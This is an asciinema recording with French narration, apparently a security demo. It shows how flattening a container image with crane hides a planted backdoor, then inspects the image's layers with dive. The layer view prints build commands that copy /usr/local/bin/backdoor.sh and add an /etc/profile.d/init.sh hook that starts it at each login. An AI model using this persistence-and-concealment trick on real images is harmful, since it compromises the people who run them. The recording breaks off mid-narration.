[0.048266, "o", "\u001b[0;32m\"sha256:c265cb3fa7c80ac67446fc0db739a202eace2b21df78d52382314a7500106fe5\"\u001b[0m\r\n\u001b[0;32m\"sha256:b8961e9c90882b1feba90cdee01f37c6e5bda1e627dc98644de2de71d953cd01\"\u001b[0m\r\n\u001b[0;32m\"sha256:b8961e9c90882b1feba90cdee01f37c6e5bda1e627dc98644de2de71d953cd01\"\u001b[0m\r\n\u001b[0;32m\"sha256:3fc6e70fa6f6aa691d7a57de88d1fec7ee5a5a60999b0a7f9de88f8f74eb4470\"\u001b[0m\r\n"]
[0.005315, "o", "$ "]
[1.548352, "i", "\r"]
[0.00154, "o", "\u001b"]
[0.180258, "o", "[1"]
[0.090141, "o", "m"]
[0.09012, "o", "→"]
[0.090095, "o", " A"]
[0.090158, "o", "ve"]
[0.090124, "o", "c "]
[0.090118, "o", "cr"]
[0.090622, "o", "an"]
[0.090156, "o", "e "]
[0.180201, "o", "f"]
[0.09011, "o", "la"]
[0.090115, "o", "tt"]
[0.090116, "o", "en"]
[0.090121, "o", ", "]
[0.090122, "o", "on"]
[0.090124, "o", " f"]
[0.090111, "o", "us"]
[0.090131, "o", "io"]
[0.180208, "o", "nn"]
[0.090152, "o", "e"]
[0.090123, "o", " t"]
[0.090146, "o", "ou"]
[0.09017, "o", "te"]
[0.090118, "o", "s "]
[0.090129, "o", "le"]
[0.090062, "o", "s "]
[0.090138, "o", "co"]
[0.180269, "o", "uc"]
[0.09015, "o", "he"]
[0.090089, "o", "s"]
[0.0901, "o", " e"]
[0.090195, "o", "n "]
[0.090054, "o", "un"]
[0.090161, "o", "e "]
[0.090151, "o", "se"]
[0.090091, "o", "ul"]
[0.180265, "o", "e "]
[0.090044, "o", ":\u001b"]
[0.090097, "o", "[0"]
[0.090103, "o", "m"]
[1.257296, "i", "\r"]
[0.000097, "o", "\r\n"]
[0.003635, "o", "$ "]
[1.048821, "i", "\r"]
[0.001415, "o", "\u001b["]
[0.180306, "o", "1m"]
[0.090145, "o", "cr"]
[0.090089, "o", "an"]
[0.09014, "o", "e "]
[0.090135, "o", "fl"]
[0.090057, "o", "at"]
[0.092325, "o", "te"]
[0.089975, "o", "n "]
[0.090124, "o", "re"]
[0.180259, "o", "gis"]
[0.090125, "o", "tr"]
[0.090151, "o", "y."]
[0.090099, "o", "sc"]
[0.090136, "o", ".l"]
[0.090126, "o", "oc"]
[0.090118, "o", "al"]
[0.090177, "o", ":3"]
[0.090063, "o", "04"]
[0.180202, "o", "43"]
[0.09015, "o", "/al"]
[0.090117, "o", "pi"]
[0.090091, "o", "ne"]
[0.090135, "o", ":3"]
[0.090197, "o", ".2"]
[0.089959, "o", "0 "]
[0.090134, "o", "-t"]
[0.09015, "o", " r"]
[0.180357, "o", "eg"]
[0.090109, "o", "is"]
[0.09014, "o", "try"]
[0.090104, "o", ".s"]
[0.09013, "o", "c."]
[0.090153, "o", "lo"]
[0.090087, "o", "ca"]
[0.09011, "o", "l:"]
[0.090134, "o", "30"]
[0.18023, "o", "44"]
[0.09011, "o", "3/"]
[0.090115, "o", "al"]
[0.090112, "o", "pin"]
[0.090143, "o", "e:"]
[0.0901, "o", "3."]
[0.090083, "o", "20"]
[0.090112, "o", "\u001b["]
[0.090134, "o", "0m"]
[0.400959, "i", "\r"]
[0.000112, "o", "\r\n"]
[1.325706, "o", "2026/07/01 21:09:46 pushed blob: sha256:f4a8f458830811a2f619ce0d8c676928979a09c2b81a342927187de4e744624a\r\n"]
[0.00371, "o", "2026/07/01 21:09:46 existing blob: sha256:f4a8f458830811a2f619ce0d8c676928979a09c2b81a342927187de4e744624a\r\n"]
[0.022757, "o", "2026/07/01 21:09:46 pushed blob: sha256:868f5b7aec64c0dd6eb6fa3dced3238326f835ea85a251c05ec98fd668cc1b2e\r\n"]
[0.008608, "o", "2026/07/01 21:09:46 registry.sc.local:30443/alpine:3.20: digest: sha256:f92e8ff1002477b38d7a9936fc7a5b022f5cac8d85eef8d2725fddece6a5846f size: 1067\r\nregistry.sc.local:30443/alpine@sha256:f92e8ff1002477b38d7a9936fc7a5b022f5cac8d85eef8d2725fddece6a5846f\r\n"]
[0.006404, "o", "$ "]
[1.948564, "i", "\r"]
[0.001403, "o", "\u001b"]
[0.18018, "o", "[1"]
[0.090108, "o", "m"]
[0.090158, "o", "→"]
[0.090083, "o", " "]
[0.090124, "o", "Ap"]
[0.09012, "o", "r"]
[0.090135, "o", "ès"]
[0.090106, "o", " l"]
[0.090191, "o", "e"]
[0.180064, "o", " f"]
[0.090131, "o", "la"]
[0.090114, "o", "tt"]
[0.090096, "o", "en"]
[0.090102, "o", ","]
[0.090111, "o", " i"]
[0.090159, "o", "l "]
[0.09009, "o", "n'"]
[0.090148, "o", "y "]
[0.18019, "o", "a"]
[0.090107, "o", " p"]
[0.090108, "o", "lu"]
[0.090125, "o", "s "]
[0.090115, "o", "qu"]
[0.090171, "o", "'"]
[0.090137, "o", "un"]
[0.090118, "o", "e "]
[0.090163, "o", "se"]
[0.180234, "o", "ul"]
[0.090081, "o", "e"]
[0.090121, "o", " c"]
[0.090162, "o", "ou"]
[0.006824, "i", "\r"]
[0.00004, "o", "\r\n"]
[0.083218, "o", "ch"]
[0.090075, "o", "e "]
[0.090106, "o", ":"]
[0.090113, "o", "\u001b["]
[0.09015, "o", "0m"]
[0.000346, "o", "\r\n"]
[0.003458, "o", "$ "]
[0.885203, "i", "\r"]
[0.001471, "o", "\u001b["]
[0.180239, "o", "1m"]
[0.090112, "o", "cr"]
[0.090181, "o", "an"]
[0.090099, "o", "e "]
[0.090153, "o", "ma"]
[0.090074, "o", "ni"]
[0.090119, "o", "fe"]
[0.090166, "o", "st"]
[0.090125, "o", " r"]
[0.180228, "o", "egi"]
[0.090072, "o", "st"]
[0.090115, "o", "ry"]
[0.090151, "o", ".s"]
[0.090128, "o", "c."]
[0.09014, "o", "lo"]
[0.090058, "o", "ca"]
[0.090064, "o", "l:"]
[0.090132, "o", "30"]
[0.180225, "o", "44"]
[0.090232, "o", "3/a"]
[0.090126, "o", "lp"]
[0.090175, "o", "in"]
[0.090032, "o", "e:"]
[0.090146, "o", "3."]
[0.090089, "o", "20"]
[0.090147, "o", " |"]
[0.09009, "o", " j"]
[0.18024, "o", "q "]
[0.090153, "o", "'."]
[0.090117, "o", "lay"]
[0.090121, "o", "er"]
[0.090126, "o", "s["]
[0.090044, "o", "] "]
[0.090138, "o", "| "]
[0.090119, "o", ".d"]
[0.090139, "o", "ig"]
[0.180193, "o", "es"]
[0.090108, "o", "t'"]
[0.090146, "o", "\u001b["]
[0.090082, "o", "0m"]
[0.38865, "i", "\r"]
[0.000118, "o", "\r\n"]
[0.044044, "o", "\u001b[0;32m\"sha256:f4a8f458830811a2f619ce0d8c676928979a09c2b81a342927187de4e744624a\"\u001b[0m\r\n"]
[0.004578, "o", "$ "]
[1.045117, "i", "\r"]
[0.001582, "o", "\u001b"]
[0.180142, "o", "[1"]
[0.09012, "o", "m"]
[0.090152, "o", "→"]
[0.090085, "o", " "]
[0.090117, "o", "Le"]
[0.090119, "o", " b"]
[0.090142, "o", "ac"]
[0.0901, "o", "kd"]
[0.090117, "o", "o"]
[0.180253, "o", "or"]
[0.090145, "o", " e"]
[0.090126, "o", "st"]
[0.090062, "o", " m"]
[0.09015, "o", "a"]
[0.090088, "o", "in"]
[0.09013, "o", "te"]
[0.090126, "o", "na"]
[0.090084, "o", "nt"]
[0.180228, "o", " "]
[0.090117, "o", "in"]
[0.090113, "o", "vi"]
[0.090088, "o", "si"]
[0.090122, "o", "bl"]
[0.090204, "o", "e"]
[0.09009, "o", " d"]
[0.090141, "o", "an"]
[0.090144, "o", "s "]
[0.180183, "o", "l'"]
[0.090117, "o", "h"]
[0.09011, "o", "is"]
[0.090152, "o", "to"]
[0.090087, "o", "ri"]
[0.090118, "o", "qu"]
[0.090134, "o", "e"]
[0.090076, "o", " d"]
[0.090118, "o", "es"]
[0.180224, "o", " c"]
[0.090093, "o", "ou"]
[0.090113, "o", "c"]
[0.090153, "o", "he"]
[0.090087, "o", "s."]
[0.090199, "o", "\u001b["]
[0.090131, "o", "0m"]
[0.353353, "i", "\r"]
[0.000095, "o", "\r\n"]
[0.003641, "o", "$ "]
[0.665861, "i", "\r"]
[0.00142, "o", "\u001b["]
[0.180279, "o", "1m"]
[0.09014, "o", "5."]
[0.090111, "o", " V"]
[0.09014, "o", "é"]
[0.090035, "o", "ri"]
[0.090119, "o", "fi"]
[0.09019, "o", "ca"]
[0.090105, "o", "ti"]
[0.090101, "o", "on"]
[0.180246, "o", " q"]
[0.090165, "o", "ue"]
[0.090079, "o", " l"]
[0.090116, "o", "'i"]
[0.090119, "o", "ma"]
[0.090127, "o", "ge"]
[0.090147, "o", " e"]
[0.090104, "o", "st"]
[0.090106, "o", " b"]
[0.180249, "o", "ie"]
[0.090038, "o", "n "]
[0.090154, "o", "da"]
[0.090083, "o", "ns"]
[0.090116, "o", " l"]
[0.090117, "o", "e "]
[0.09012, "o", "re"]
[0.090167, "o", "gi"]
[0.090102, "o", "st"]
[0.180213, "o", "re"]
[0.090081, "o", "\u001b["]
[0.09014, "o", "0m"]
[0.367653, "i", "\r"]
[0.000101, "o", "\r\n"]
[0.003867, "o", "$ "]
[0.446316, "i", "\r"]
[0.001449, "o", "\u001b["]
[0.180303, "o", "1m"]
[0.090109, "o", "di"]
[0.090129, "o", "ve"]
[0.090146, "o", " p"]
[0.090104, "o", "od"]
[0.090063, "o", "ma"]
[0.090118, "o", "n:"]
[0.090112, "o", "//"]
[0.090132, "o", "re"]
[0.18024, "o", "gi"]
[0.090081, "o", "st"]
[0.090167, "o", "ry"]
[0.090155, "o", ".s"]
[0.090104, "o", "c."]
[0.090113, "o", "lo"]
[0.090053, "o", "ca"]
[0.090175, "o", "l:"]
[0.090049, "o", "30"]
[0.180151, "o", "44"]
[0.09009, "o", "3/"]
[0.090157, "o", "al"]
[0.090125, "o", "pi"]
[0.090119, "o", "ne"]
[0.090141, "o", ":3"]
[0.090154, "o", ".2"]
[0.090047, "o", "0\u001b"]
[0.090136, "o", "[0"]
[0.180178, "o", "m"]
[0.417747, "i", "\r"]
[0.000098, "o", "\r\n"]
[0.007329, "o", "\u001b[1mImage Source: \u001b[0mpodman://registry.sc.local:30443/alpine:3.20\r\n\u001b[1mFetching image...\u001b[0m (this can take a while for large images)\r\n"]
[0.170527, "o", "\u001b[1mAnalyzing image...\u001b[0m\r\n"]
[0.001618, "o", "\u001b[1mBuilding cache...\u001b[0m\r\n"]
[0.111931, "o", "\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?2004l\u001b[?1049h\u001b[?1h\u001b=\u001b[?25l\u001b[H\u001b[2J"]
[0.007434, "o", "\u001b[?25l\u001b[1;1H                                                                                                                                                                                               \u001b[2;1H                                                                                                                                                                                               \u001b[3;1H                                                                                                                                                                                               \u001b[4;1H                                                                                                                                                                                               \u001b[5;1H                                                                                                                                                                                               \u001b[6;1H                                                                                                                                                                                               \u001b[7;1H                                                                                                                                                                                               \u001b[8;1H                                                                                                                                                                                               \u001b[9;1H                                                                                                                                                                                               \u001b[10;1H                                                                                                                                                                                               \u001b[11;1H                                                                                                                                                                                               \u001b[12;1H                                                                                                                                                                                               \u001b[13;1H                                                                                                                                                                                               \u001b[14;1H                                                                                                                                                                                               \u001b[15;1H                                                                                                                                                                                               \u001b[16;1H                                                                                                                                                                                               \u001b[17;1H                                                                                                                                                                                               \u001b[18;1H                                                                                                                                                                                               \u001b[19;1H                                                                                                                                                                                               \u001b[20;1H                                                                                                                                                                                               \u001b[21;1H                                                                                                                                   "]
[0.00012, "o", "                                                            \u001b[22;1H                                                                                                                                                                                               \u001b[23;1H                                                                                                                                                                                               \u001b[24;1H                                                                                                                                                                                               \u001b[25;1H                                                                                                                                                                                               \u001b[26;1H                                                                                                                                                                                               \u001b[27;1H                                                                                                                                                                                               \u001b[28;1H                                                                                                                                                                                               \u001b[29;1H                                                                                                                                                                                               \u001b[30;1H                                                                                                                                                                                               \u001b[31;1H                                                                                                                                                                                               \u001b[32;1H                                                                                                                                                                                               \u001b[33;1H                                                                                                                                                                                               \u001b[34;1H                                                                                                                                                                                               \u001b[35;1H                                                                                                                                                                                               \u001b[36;1H                                                                                                                                                                                               \u001b[37;1H                                                                                                                                                                                               \u001b[38;1H                                                                                                                                                                                               \u001b[39;1H                                                                                                                                                                                               \u001b[40;1H                                                                                                                                                                                               \u001b[41;1H                                                                                                                                                                                               \u001b[42;1H                                                                    "]
[0.000037, "o", "                                                                                                                           \u001b[43;1H                                                                                                                                                                                               \u001b[44;1H                                                                                                                                                                                               \u001b[45;1H                                                                                                                                                                                               \u001b[?25l"]
[0.001685, "o", "\u001b[?25l\u001b[?25l"]
[0.011789, "o", "\u001b[?25l\u001b[1;97H│\u001b(B\u001b[m\u001b[1m Current Layer Contents \u001b(B\u001b[m├─────────────────────────────────────────────────────────────────────\u001b[2;1H┃\u001b(B\u001b[m\u001b[1m ● Layers \u001b(B\u001b[m┣━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\u001b[2;97HPermission\u001b[2;112HUID:GID\u001b[2;126HSize\u001b[2;132HFiletree\u001b[3;1HCmp\u001b[3;7HSize\u001b[3;13HCommand\u001b[3;97H\u001b(B\u001b[m\u001b[1m\u001b[7mdrwxr-xr-x         0:0     809 kB  ├── bin\u001b[4;1H\u001b(B\u001b[m\u001b[45m  \u001b[4;4H\u001b(B\u001b[m\u001b[1m\u001b[7m 7.8 MB  FROM 08bc4e534116aa7\u001b[4;97H\u001b(B\u001b[m-rwxrwxrwx\u001b[4;116H0:0\u001b[4;127H0\u001b[4;129HB\u001b[4;132H│\u001b[4;136H├──\u001b[4;140Harch\u001b[4;145H→\u001b[4;147H/bin/busybox\u001b[5;6H486\u001b[5;10HB\u001b[5;13H#(nop)\u001b[5;20HCOPY\u001b[5;25Hfile:0d6c9b200945ebaf3fb9a081bdd67e9696594cc3a1e4190de08537e55966444f\u001b[5;95Hi\u001b[5;97H-rwxrwxrwx\u001b[5;116H0:0\u001b[5;127H0\u001b[5;129HB\u001b[5;132H│\u001b[5;136H├──\u001b[5;140Hash\u001b[5;144H→\u001b[5;146H/bin/busybox\u001b[6;6H486\u001b[6;10HB\u001b[6;13Hchmod\u001b[6;19H+x\u001b[6;22H/usr/local/bin/backdoor.sh\u001b[6;97H-rwxrwxrwx\u001b[6;116H0:0\u001b[6;127H0\u001b[6;129HB\u001b[6;132H│\u001b[6;136H├──\u001b[6;140Hbase64\u001b[6;147H→\u001b[6;149H/bin/busybox\u001b[7;7H39\u001b[7;10HB\u001b[7;13Hecho\u001b[7;18H'#!/bin/sh'\u001b[7;30H>\u001b[7;32H/etc/profile.d/init.sh\u001b[7;55H&&\u001b[7;62Hecho\u001b[7;67H'/usr/local/bin/backdoor.sh\u001b[7;95H&\u001b[7;97H-rwxrwxrwx\u001b[7;116H0:0\u001b[7;127H0\u001b[7;129HB\u001b[7;132H│\u001b[7;136H├──\u001b[7;140Hbbconfig\u001b[7;149H→\u001b[7;151H/bin/busybox\u001b[8;97H-rwxr-xr-x\u001b[8;116H0:0\u001b[8;124H809\u001b[8;128HkB\u001b[8;132H│\u001b[8;136H├──\u001b[8;140Hbusybox\u001b[9;97H-rwxrwxrwx\u001b[9;116H0:0\u001b[9;127H0\u001b[9;129HB\u001b[9;132H│\u001b[9;136H├──\u001b[9;140Hcat\u001b[9;144H→\u001b[9;146H/bin/busybox\u001b[10;97H-rwxrwxrwx\u001b[10;116H0:0\u001b[10;127H0\u001b[10;129HB\u001b[10;132H│\u001b[10;136H├──\u001b[10;140Hchattr\u001b[10;147H→\u001b[10;149H/bin/busybox\u001b[11;97H-rwxrwxrwx\u001b[11;116H0:0\u001b[11;127H0\u001b[11;129HB\u001b[11;132H│\u001b[11;136H├──\u001b[11;140Hchgrp\u001b[11;146H→\u001b[11;148H/bin/busybox\u001b[12;97H-rwxrwxrwx\u001b[12;116H0:0\u001b[12;127H0\u001b[12;129HB\u001b[12;132H│\u001b[12;136H├──\u001b[12;140Hchmod\u001b[12;146H→\u001b[12;148H/bin/busybox\u001b[13;97H-rwxrwxrwx\u001b[13;116H0:0\u001b[13;127H0\u001b[13;129HB\u001b[13;132H│\u001b[13;136H├──\u001b[13;140Hchown\u001b[13;146H→\u001b[13;148H/bin/busybox\u001b[14;97H-rwxrwxrwx\u001b[14;116H0:0\u001b[14;127H0\u001b[14;129HB\u001b[14;132H│\u001b[14;136H├──\u001b[14;140Hcp\u001b[14;143H→\u001b[14;145H/bin/busybox\u001b[15;97H-rwxrwxrwx\u001b[15;116H0:0\u001b[15;127H0\u001b[15;129HB\u001b[15;132H│\u001b[15;136H├──\u001b[15;140Hdate\u001b[15;145H→\u001b[15;147H/bin/busybox\u001b[16;1H│\u001b(B\u001b[m\u001b[1m Layer Details \u001b(B\u001b[m├──────────────────────────────────────────────────────────────────────────────\u001b[16;97H-rwxrwxrwx\u001b[16;116H0:0\u001b[16;127H0\u001b[16;129HB\u001b[16;132H│\u001b[16;136H├──\u001b[16;140Hdd\u001b[16;143H→\u001b[16;145H/bin/busybox\u001b[17;97H-rwxrwxrwx\u001b[17;116H0:0\u001b[17;127H0\u001b[17;129HB\u001b[17;132H│\u001b[17;136H├──\u001b[17;140Hdf\u001b[17;143H→\u001b[17;145H/bin/busybox\u001b[18;1H\u001b(B\u001b[m\u001b[1mTags:   (unavailable)\u001b[18;97H\u001b(B\u001b[m-rwxrwxrwx\u001b[18;116H0:0\u001b[18;127H0\u001b[18;129HB\u001b[18;132H│\u001b[18;136H├──\u001b[18;140Hdmesg\u001b[18;146H→\u001b[18;148H/bin/busybox\u001b[19;1H\u001b(B\u001b[m\u001b[1mId:     \u001b(B\u001b[m08bc4e534116aa76b16015484b82eac51f9a593416feae9296c8a2d4bb7aa4a2.tar\u001b[19;97H-rwxrwxrwx\u001b[19;116H0:0\u001b[19;127H0\u001b[19;129HB\u001b[19;132H│\u001b[19;136H├──\u001b[19;140Hdnsdomainname\u001b[19;154H→\u001b[19;156H/bin/busybox\u001b[20;1H\u001b(B\u001b[m\u001b[1mDigest: \u001b(B\u001b[msha256:08bc4e534116aa76b16015484b82eac51f9a593416feae9296c8a2d4bb7aa4a2\u001b[20;97H-rwxrwxrwx\u001b[20;116H0:0\u001b[20;127H0\u001b[20;129HB\u001b[20;132H│\u001b[20;136H├──\u001b[20;140Hdumpkmap\u001b[20;149H→\u001b[20;151H/bin/busybox\u001b[21;1H\u001b(B\u001b[m\u001b[1mCommand:\u001b[21;97H\u001b(B\u001b[m-rwxrwxrwx\u001b[21;116H0:0\u001b[21;127H0\u001b[21;129HB\u001b[21;132H│\u001b[21;136H├──\u001b[21;140Hecho\u001b[21;145H→\u001b[21;147H/bin/busybox\u001b[22;1HADD\u001b[22;5Halpine-minirootfs-3.20.10-x86_64.tar.gz\u001b[22;45H/\u001b[22;47H#\u001b[22;49Hbuildkit\u001b[22;97H-rwxrwxrwx\u001b[22;116H0:0\u001b[22;127H0\u001b[22;129HB\u001b[22;132H│\u001b[22;136H├──\u001b[22;140Hegrep\u001b[22;146H→\u001b[22;148"]
[0.000044, "o", "H/bin/busybox\u001b[23;97H-rwxrwxrwx\u001b[23;116H0:0\u001b[23;127H0\u001b[23;129HB\u001b[23;132H│\u001b[23;136H├──\u001b[23;140Hfalse\u001b[23;146H→\u001b[23;148H/bin/busybox\u001b[24;97H-rwxrwxrwx\u001b[24;116H0:0\u001b[24;127H0\u001b[24;129HB\u001b[24;132H│\u001b[24;136H├──\u001b[24;140Hfatattr\u001b[24;148H→\u001b[24;150H/bin/busybox\u001b[25;97H-rwxrwxrwx\u001b[25;116H0:0\u001b[25;127H0\u001b[25;129HB\u001b[25;132H│\u001b[25;136H├──\u001b[25;140Hfdflush\u001b[25;148H→\u001b[25;150H/bin/busybox\u001b[26;97H-rwxrwxrwx\u001b[26;116H0:0\u001b[26;127H0\u001b[26;129HB\u001b[26;132H│\u001b[26;136H├──\u001b[26;140Hfgrep\u001b[26;146H→\u001b[26;148H/bin/busybox\u001b[27;97H-rwxrwxrwx\u001b[27;116H0:0\u001b[27;127H0\u001b[27;129HB\u001b[27;132H│\u001b[27;136H├──\u001b[27;140Hfsync\u001b[27;146H→\u001b[27;148H/bin/busybox\u001b[28;97H-rwxrwxrwx\u001b[28;116H0:0\u001b[28;127H0\u001b[28;129HB\u001b[28;132H│\u001b[28;136H├──\u001b[28;140Hgetopt\u001b[28;147H→\u001b[28;149H/bin/busybox\u001b[29;97H-rwxrwxrwx\u001b[29;116H0:0\u001b[29;127H0\u001b[29;129HB\u001b[29;132H│\u001b[29;136H├──\u001b[29;140Hgrep\u001b[29;145H→\u001b[29;147H/bin/busybox\u001b[30;1H│\u001b(B\u001b[m\u001b[1m Image Details \u001b(B\u001b[m├──────────────────────────────────────────────────────────────────────────────\u001b[30;97H-rwxrwxrwx\u001b[30;116H0:0\u001b[30;127H0\u001b[30;129HB\u001b[30;132H│\u001b[30;136H├──\u001b[30;140Hgunzip\u001b[30;147H→\u001b[30;149H/bin/busybox\u001b[31;97H-rwxrwxrwx\u001b[31;116H0:0\u001b[31;127H0\u001b[31;129HB\u001b[31;132H│\u001b[31;136H├──\u001b[31;140Hgzip\u001b[31;145H→\u001b[31;147H/bin/busybox\u001b[32;1H\u001b(B\u001b[m\u001b[1mImage name: registry.sc.local:30443/alpine:3.20\u001b[32;97H\u001b(B\u001b[m-rwxrwxrwx\u001b[32;116H0:0\u001b[32;127H0\u001b[32;129HB\u001b[32;132H│\u001b[32;136H├──\u001b[32;140Hhostname\u001b[32;149H→\u001b[32;151H/bin/busybox\u001b[33;1H\u001b(B\u001b[m\u001b[1mTotal Image size:\u001b[33;19H\u001b(B\u001b[m7.8\u001b[33;23HMB\u001b[33;97H-rwxrwxrwx\u001b[33;116H0:0\u001b[33;127H0\u001b[33;129HB\u001b[33;132H│\u001b[33;136H├──\u001b[33;140Hionice\u001b[33;147H→\u001b[33;149H/bin/busybox\u001b[34;1H\u001b(B\u001b[m\u001b[1mPotential wasted space:\u001b[34;25H\u001b(B\u001b[m972\u001b[34;29HB\u001b[34;97H-rwxrwxrwx\u001b[34;116H0:0\u001b[34;127H0\u001b[34;129HB\u001b[34;132H│\u001b[34;136H├──\u001b[34;140Hiostat\u001b[34;147H→\u001b[34;149H/bin/busybox\u001b[35;1H\u001b(B\u001b[m\u001b[1mImage efficiency score:\u001b[35;25H\u001b(B\u001b[m99\u001b[35;28H%\u001b[35;97H-rwxrwxrwx\u001b[35;116H0:0\u001b[35;127H0\u001b[35;129HB\u001b[35;132H│\u001b[35;136H├──\u001b[35;140Hipcalc\u001b[35;147H→\u001b[35;149H/bin/busybox\u001b[36;97H-rwxrwxrwx\u001b[36;116H0:0\u001b[36;127H0\u001b[36;129HB\u001b[36;132H│\u001b[36;136H├──\u001b[36;140Hkbd_mode\u001b[36;149H→\u001b[36;151H/bin/busybox\u001b[37;1H\u001b(B\u001b[m\u001b[1mCount   Total Space  Path\u001b[37;97H\u001b(B\u001b[m-rwxrwxrwx\u001b[37;116H0:0\u001b[37;127H0\u001b[37;129HB\u001b[37;132H│\u001b[37;136H├──\u001b[37;140Hkill\u001b[37;145H→\u001b[37;147H/bin/busybox\u001b[38;5H2\u001b[38;15H972\u001b[38;19HB\u001b[38;22H/usr/local/bin/backdoor.sh\u001b[38;97H-rwxrwxrwx\u001b[38;116H0:0\u001b[38;127H0\u001b[38;129HB\u001b[38;132H│\u001b[38;136H├──\u001b[38;140Hlink\u001b[38;145H→\u001b[38;147H/bin/busybox\u001b[39;97H-rwxrwxrwx\u001b[39;116H0:0\u001b[39;127H0\u001b[39;129HB\u001b[39;132H│\u001b[39;136H├──\u001b[39;140Hlinux32\u001b[39;148H→\u001b[39;150H/bin/busybox\u001b[40;97H-rwxrwxrwx\u001b[40;116H0:0\u001b[40;127H0\u001b[40;129HB\u001b[40;132H│\u001b[40;136H├──\u001b[40;140Hlinux64\u001b[40;148H→\u001b[40;150H/bin/busybox\u001b[41;97H-rwxrwxrwx\u001b[41;116H0:0\u001b[41;127H0\u001b[41;129HB\u001b[41;132H│\u001b[41;136H├──\u001b[41;140Hln\u001b[41;143H→\u001b[41;145H/bin/busybox\u001b[42;97H-rwxrwxrwx\u001b[42;116H0:0\u001b[42;127H0\u001b[42;129HB\u001b[42;132H│\u001b[42;136H├──\u001b[42;140Hlogin\u001b[42;146H→\u001b[42;148H/bin/busybox\u001b[43;97H-rwxrwxrwx\u001b[43;116H0:0\u001b[43;127H0\u001b[43;129HB\u001b[43;132H│\u001b[43;136H├──\u001b[43;140Hls\u001b[43;143H→\u001b[43;145H/bin/busybox\u001b[44;97H-rwxrwxrwx\u001b[44;116H0:0\u001b[44;127H0\u001b[44;129HB\u001b[44;132H│\u001b[44;136H├──\u001b[44;140Hlsattr\u001b[44;147H→\u001b[44;149H/bin/busybox\u001b[45;1H\u001b(B\u001b[m\u001b[7m▏\u001b(B\u001b[m\u001b[1m\u001b[7m^C\u001b(B\u001b[m\u001b[7m Quit ▏\u001b(B\u001b[m\u001b[1m\u001b[7mTab\u001b(B\u001b[m\u001b[7m Switch view ▏\u001b(B\u001b[m\u001b[1m\u001b[7m^F\u001b(B\u001b[m\u001b[7m Filter \u001b(B\u001b[m\u001b[37;45m▏\u001b(B\u001b[m\u001b[37;45m\u001b[1m^L\u001b(B\u001b[m\u001b[37;45m Show layer changes \u001b(B\u001b[m\u001b[7m▏\u001b(B\u001b[m\u001b[1m\u001b[7m^A\u001b(B\u001b[m\u001b[7m Show aggregated changes ▏                                                                                                      \u001b[?25l"]
[4.266207, "i", "\u001bOB"]
[0.006873, "o", "\u001b[?25l\u001b[4;1H\u001b(B\u001b[m\u001b[42m  \u001b[4;4H\u001b(B\u001b[m 7.8 MB  FROM 08bc4e534116aa7\u001b[5;1H\u001b(B\u001b[m\u001b[45m  \u001b[5;4H\u001b(B\u001b[m\u001b[1m\u001b[7m  486 B  #(nop) COPY file:0d6c9b200945ebaf3fb9a081bdd67e9696594cc3a1e4190de08537e55966444f i\u001b[19;9H\u001b(B\u001b[m3be\u001b[19;13He604\u001b[19;18Hd7a4bb5cdd45c2ed7f65\u001b[19;39Hf434edd67c62ccdaad8592beb22\u001b[19;67H334964\u001b[20;16H3be\u001b[20;20He604\u001b[20;25Hd7a4bb5cdd45c2ed7f65\u001b[20;46Hf434edd67c62ccdaad8592beb22\u001b[20;74H334964\u001b[22;1H#(nop) COPY file:0d6c9b20\u001b[22;27H945ebaf3fb9a081bdd67e9696594cc3a1e4190de08537e55966444f\u001b[22;83Hin\u001b[22;86H/usr/local\u001b[23;1H/bin/backdoor.sh\u001b[?25l"]
[0.618818, "i", "\u001bOB"]
[0.006681, "o", "\u001b[?25l\u001b[5;1H\u001b(B\u001b[m\u001b[42m  \u001b[5;4H\u001b(B\u001b[m  486 B  #(nop) COPY file:0d6c9b200945ebaf3fb9a081bdd67e9696594cc3a1e4190de08537e55966444f i\u001b[6;1H\u001b(B\u001b[m\u001b[45m  \u001b[6;4H\u001b(B\u001b[m\u001b[1m\u001b[7m  486 B  chmod +x /usr/local/bin/backdoor.sh\u001b[22;1H\u001b(B\u001b[mchm\u001b[22;5Hd +x /usr/\u001b[22;16Hocal/bin/backdoor.sh                                              \u001b[22;83H  \u001b[22;86H          \u001b[23;1H                \u001b[?25l"]
[0.640002, "i", "\u001bOB"]
[0.007852, "o", "\u001b[?25l\u001b[6;1H\u001b(B\u001b[m\u001b[42m  \u001b[6;4H\u001b(B\u001b[m  486 B  chmod +x /usr/local/bin/backdoor.sh\u001b[7;1H\u001b(B\u001b[m\u001b[45m  \u001b[7;4H\u001b(B\u001b[m\u001b[1m\u001b[7m   39 B  echo '#!/bin/sh' > /etc/profile.d/init.sh &&     echo '/usr/local/bin/backdoor.sh &\u001b[19;9H\u001b(B\u001b[m5011b575ca4fc434ba52f5461d00d8c8268c85178de69\u001b[19;55H9261f3\u001b[19;62H67bd3251777\u001b[20;16H5011b575ca4fc434ba52f5461d00d8c8268c85178de69\u001b[20;62H9261f3\u001b[20;69H67bd3251777\u001b[22;1Hech\u001b[22;5H '#!/bin/sh' > \u001b[22;21Hetc\u001b[22;25Hprofile.d/init.sh\u001b[22;43H&&\u001b[22;50Hecho\u001b[22;55H'/usr/local/bin/backdoor.sh\u001b[22;83H&'\u001b[22;86H>>\u001b[22;89H/etc/pr\u001b[23;1Hofile.d/init.sh\u001b[23;17H&&\u001b[23;24Hchmod\u001b[23;30H+x\u001b[23;33H/etc/profile.d/init.sh\u001b[?25l"]
[3.541447, "i", "\u001bOB"]
[0.00165, "o", "\u001b[?25l\u001b[?25l"]
[5.587284, "i", "\u0003"]
[0.000169, "o", "\u001b[?12l\u001b[?25h\u001b(B\u001b[m\u001b[H\u001b[2J\u001b[?1049l"]
[0.000006, "o", "\u001b[?1l\u001b>\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l"]
[0.000012, "o", "\u001b[?2004l"]
[0.006734, "o", "$ "]
[1.827194, "i", "\r"]
[0.001667, "o", "\u001b"]
[0.180284, "o", "[1"]
[0.09013, "o", "m"]
[0.090114, "o", "→"]
[0.090177, "o", " L"]
[0.090049, "o", "e "]
[0.090125, "o", "re"]
[0.090134, "o", "gi"]
[0.090095, "o", "st"]
[0.090076, "o", "re"]
[0.18024, "o", " "]
[0.090091, "o", "co"]
[0.090118, "o", "nt"]
[0.090151, "o", "ie"]
[0.090089, "o", "nt"]
[0.090119, "o", " l"]
[0.090147, "o", "'i"]
[0.090181, "o", "ma"]
